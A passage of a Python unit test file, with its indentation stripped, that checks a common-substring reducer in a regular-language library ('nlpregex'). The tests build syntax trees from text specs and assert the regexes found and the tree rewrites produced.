self.assertEqual( len(reducer01.map_regex_to_node_set), 3)
nodes01 = reducer01.map_regex_to_node_set['( t10 | t11 )%t3']
self.assertEqual( len(nodes01), 2)
positions01_01 = nodes01[series01]
positions01_02 = nodes01[series02]
self.assertEqual( len(positions01_01), 1)
self.assertEqual( len(positions01_02), 1)
self.assertEqual( 1 in positions01_01, True)
self.assertEqual( 2 in positions01_02, True)
nodes02 = reducer01.map_regex_to_node_set['t3%t12 ?']
self.assertEqual( len(nodes02), 2)
positions02_01 = nodes02[series01]
positions02_02 = nodes02[series02]
self.assertEqual( len(positions02_01), 1)
self.assertEqual( len(positions02_02), 1)
self.assertEqual( 2 in positions02_01, True)
self.assertEqual( 3 in positions02_02, True)
nodes03 = reducer01.map_regex_to_node_set['( t10 | t11 )%t3%t12 ?']
self.assertEqual( len(nodes03), 2)
positions03_01 = nodes03[series01]
positions03_02 = nodes03[series02]
self.assertEqual( len(positions03_01), 1)
self.assertEqual( len(positions03_02), 1)
self.assertEqual( 1 in positions03_01, True)
self.assertEqual( 2 in positions03_02, True)
def test_find_best_regex_0001( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T2_10 T3_11 T4_12 T8_13 T9_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
regex01 = reducer01.find_best_regex()
self.assertEqual( regex01, 't2%t3%t4' )
def test_find_best_regex_0002( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T9_11 T10_12 T11_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
regex01 = reducer01.find_best_regex()
self.assertEqual( regex01, '' )
def test_find_best_regex_0003( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T1_9 T8_10 T3_11 T10_12 T5_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
regex01 = reducer01.find_best_regex()
# print (regex01)
self.assertEqual( regex01, '' )
def test_find_best_regex_0004( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T2_9 T1_10 T2_11 T8_12 T5_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
regex01 = reducer01.find_best_regex()
# print (regex01)
self.assertEqual( regex01, 't1%t2' )
def test_find_best_regex_0005( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T2_9 T3_10 T2_11 T8_12 T5_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
regex01 = reducer01.find_best_regex()
# print (regex01)
self.assertEqual( regex01, 't2%t3' )
def test_find_best_regex_0006( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T1_9 T2_10 T3_11 T8_12 T5_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
regex01 = reducer01.find_best_regex()
# print (regex01)
self.assertEqual( regex01, 't1%t2%t3' )
def test_find_best_regex_0007( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T4_11 T5_12 T6_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
regex01 = reducer01.find_best_regex()
# print (regex01)
self.assertEqual( regex01, 't4%t5%t6' )
def test_find_best_regex_0008( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T9_11 T3_12 T4_13 T5_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
regex01 = reducer01.find_best_regex()
# print (regex01)
self.assertEqual( regex01, 't3%t4%t5' )
def test_find_best_regex_0009( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T9_11 T4_12 T5_13 T6_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
regex01 = reducer01.find_best_regex()
# print (regex01)
self.assertEqual( regex01, 't4%t5%t6' )
def test_find_best_regex_0010( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T1_6 T2_7 T3_8
S_2:T1_9 T2_10 T3_11 T1_12 T2_13 T3_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
regex01 = reducer01.find_best_regex()
# print (regex01)
self.assertEqual( regex01, 't1%t2%t3' )
def test_find_best_regex_0011( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1
S_1:T1_3 T2_4 T3_5 T1_6 T2_7 T3_8
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
regex01 = reducer01.find_best_regex()
# print (regex01)
self.assertEqual( regex01, 't1%t2%t3' )
def test_find_best_regex_0012( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 |_4 T3_5 ?_6 T5_7 T6_8
S_2:T7_9 T8_10 |_11 T3_12 ?_13 T9_14
|_4:T10_15 T11_16
?_6:T12_17
|_11:T10_18 T11_19
?_13:T12_20
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
regex01 = reducer01.find_best_regex()
# print (regex01)
self.assertEqual( regex01, '( t10 | t11 )%t3%t12 ?' )
def test_remove_children_and_replace_with_nonterminal_0001(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 3, [1] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1
S_1:T2_2 N1_7 T6_6
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
def test_remove_children_and_replace_with_nonterminal_0002(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 3, [0] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1
S_1:N1_7 T5_5 T6_6
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
def test_remove_children_and_replace_with_nonterminal_0003(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 3, [2] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1
S_1:T2_2 T3_3 N1_7
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
def test_remove_children_and_replace_with_nonterminal_0004(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 5, [0] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:N1_1
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
def test_remove_children_and_replace_with_nonterminal_0005(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 3, [0, 3] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1
S_1:N1_8 N1_9
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
def test_remove_children_and_replace_with_nonterminal_0006(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 2, [0, 2, 4] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1
S_1:N1_8 N1_9 N1_10
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
def test_remove_children_and_replace_with_nonterminal_0007(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 2, [1, 3] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1
S_1:T2_2 N1_8 N1_9 T4_7
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
def test_remove_children_and_replace_with_nonterminal_0008(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 2, [1, 4] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1
S_1:T2_2 N1_8 T2_5 N1_9
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
def test_remove_children_and_replace_with_nonterminal_0009(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.remove_children_and_replace_with_nonterminal( ast00, 'n1', 2, [0, 4] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1
S_1:N1_8 T4_4 T2_5 N1_9
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
def test_move_children_to_new_tree_0001(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.move_children_to_new_tree( ast00, 'n1', 3, [1] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1 S_8
S_1:T2_2 N1_7 T6_6
S_8:T3_3 T4_4 T5_5
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
ast01 = self.helper.get_node( forrest01, 8 )
self.assertEqual( ast01, root01.children_map['n1'] )
def test_move_children_to_new_tree_0002(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.move_children_to_new_tree( ast00, 'n1', 3, [0] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1 S_8
S_1:N1_7 T5_5 T6_6
S_8:T2_2 T3_3 T4_4
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
ast01 = self.helper.get_node( forrest01, 8 )
self.assertEqual( ast01, root01.children_map['n1'] )
def test_move_children_to_new_tree_0003(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.move_children_to_new_tree( ast00, 'n1', 3, [2] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1 S_8
S_1:T2_2 T3_3 N1_7
S_8:T4_4 T5_5 T6_6
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
ast01 = self.helper.get_node( forrest01, 8 )
self.assertEqual( ast01, root01.children_map['n1'] )
def test_move_children_to_new_tree_0004(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T5_5 T6_6
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.move_children_to_new_tree( ast00, 'n1', 5, [0] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:N1_1 S_8
S_8:T2_2 T3_3 T4_4 T5_5 T6_6
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
ast01 = self.helper.get_node( forrest01, 8 )
self.assertEqual( ast01, root01.children_map['n1'] )
def test_move_children_to_new_tree_0005(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.move_children_to_new_tree( ast00, 'n1', 3, [0, 3] )
spec02 = self.helper.display_tree( forrest01.root )
spec02_expected = '''
R_0:S_1 S_10
S_1:N1_8 N1_9
S_10:T2_2 T3_3 T4_4
'''
# self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
ast01 = self.helper.get_node( forrest01, 10 )
# self.assertEqual( ast01, root01.children_map['n1'] )
def test_move_children_to_new_tree_0006(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.move_children_to_new_tree( ast00, 'n1', 2, [0, 2, 4] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1 S_11
S_1:N1_8 N1_9 N1_10
S_11:T2_2 T3_3
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
ast01 = self.helper.get_node( forrest01, 11 )
self.assertEqual( ast01, root01.children_map['n1'] )
def test_move_children_to_new_tree_0007(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.move_children_to_new_tree( ast00, 'n1', 2, [1, 3] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1 S_10
S_1:T2_2 N1_8 N1_9 T4_7
S_10:T3_3 T4_4
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
ast01 = self.helper.get_node( forrest01, 10 )
self.assertEqual( ast01, root01.children_map['n1'] )
def test_move_children_to_new_tree_0008(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.move_children_to_new_tree( ast00, 'n1', 2, [1, 4] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1 S_10
S_1:T2_2 N1_8 T2_5 N1_9
S_10:T3_3 T4_4
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
ast01 = self.helper.get_node( forrest01, 10 )
self.assertEqual( ast01, root01.children_map['n1'] )
def test_move_children_to_new_tree_0009(self):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.move_children_to_new_tree( ast00, 'n1', 2, [0, 4] )
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1 S_10
S_1:N1_8 T4_4 T2_5 N1_9
S_10:T2_2 T3_3
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
ast01 = self.helper.get_node( forrest01, 10 )
self.assertEqual( ast01, root01.children_map['n1'] )
def test_reduce_best_common_substring_0001( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:S_1
S_1:T2_2 T3_3 T4_4 T2_5 T3_6 T4_7
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.reduce_best_common_substring()
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:S_1 S_10
S_1:N1_8 N1_9
S_10:T2_2 T3_3 T4_4
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
ast01 = self.helper.get_node( forrest01, 10 )
self.assertEqual( ast01, root01.children_map['n1'] )
def test_reduce_best_common_substring_0002( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:|_1
|_1:S_2 S_3
S_2:T2_4 T3_5 T4_6 T2_7 T3_8 T4_9
S_3:T2_10 T3_11 T4_12 T2_13 T3_14 T4_15
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.reduce_best_common_substring()
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:|_1 S_18
|_1:S_2 S_3
S_2:N1_16 N1_17
S_3:N1_19 N1_20
S_18:T2_4 T3_5 T4_6
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
ast01 = self.helper.get_node( forrest01, 18 )
self.assertEqual( ast01, root01.children_map['n1'] )
def test_reduce_best_common_substring_0003( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:|_1
|_1:S_2 S_3 S_4
S_2:T5_5 T1_6 T2_7 T3_8
S_3:T9_9 T1_10 T2_11 T3_12 T13_13 T14_14
S_4:T1_15 T2_16 T3_17 T18_18 T19_19 T20_20
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.reduce_best_common_substring()
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:|_1 S_22
|_1:S_2 S_3 S_4
S_2:T5_5 N1_21
S_3:T9_9 N1_23 T13_13 T14_14
S_4:N1_24 T18_18 T19_19 T20_20
S_22:T1_6 T2_7 T3_8
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
ast01 = self.helper.get_node( forrest01, 22 )
self.assertEqual( ast01, root01.children_map['n1'] )
def test_reduce_0001( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
spec01= '''
R_0:|_1
|_1:S_2 S_3 S_4
S_2:T5_5 T1_6 T2_7 T3_8
S_3:T9_9 T1_10 T2_11 T3_12 T4_13 T5_14
S_4:T1_15 T2_16 T3_17 T4_18 T5_19 T20_20
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
ast00 = self.helper.get_node( forrest01, 1 )
root01.children_map['n0'] = ast00
forrest01.next_nonterminal_num = 1
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
reducer01.reduce()
spec02 = self.helper.display_tree( forrest01.root )
# print (spec02)
spec02_expected = '''
R_0:|_1 S_22 S_26
|_1:S_2 S_3 S_4
S_2:T5_5 N1_21
S_3:T9_9 N2_25
S_4:N2_27 T20_20
S_22:T1_6 T2_7 T3_8
S_26:N1_23 T4_13 T5_14
'''
self.assertEqual( self.helper.compare_specs( spec02, spec02_expected ), True )
ast01 = self.helper.get_node( forrest01, 22 )
self.assertEqual( ast01, root01.children_map['n1'] )
ast02 = self.helper.get_node( forrest01, 26 )
self.assertEqual( ast02, root01.children_map['n2'] )
if __name__ == '__main__':
unittest.main()
| 35.139868
| 108
| 0.636208
| 7,917
| 63,814
| 4.784767
| 0.025262
